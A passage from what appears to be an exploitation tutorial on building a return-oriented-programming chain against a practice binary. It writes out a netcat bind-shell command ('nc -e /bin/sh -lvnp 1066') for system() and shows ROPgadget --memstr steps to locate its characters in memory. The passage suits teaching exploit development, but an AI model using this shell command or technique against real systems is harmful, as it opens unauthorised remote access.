The question of what specific command you'll try to pass to system() is for you to decide. In our actual demo, I'm just launching sh. However, there's potential for remote compromise here. Take this netcat command:

nc -e /bin/sh -lvnp 1066

This will set up a session with sh and pass it to a local listener on port 1066. All we need are the precise locations in the vulnerable program where we can find the characters needed to construct this line. This sounds daunting, but ROPgadget is here to save us a lot of time with the --memstr flag. Naturally, we only need a single memory address per character, so it'd be cleanest to just pass a string of the unique characters in our bash command. Use Python for this task, look slick, and impress your friends. Start the interactive interpreter with python and then run this command:

''.join(set('nc -e /bin/sh -lvnp 1066'))

Use exit() to close the interpreter and then pass the result of that command as an argument to --memstr:

# /root/ROPgadget/ROPgadget.py --binary /root/buff --memstr " cbe0ih6-l/n1psv"

The preceding command should produce the following screenshot: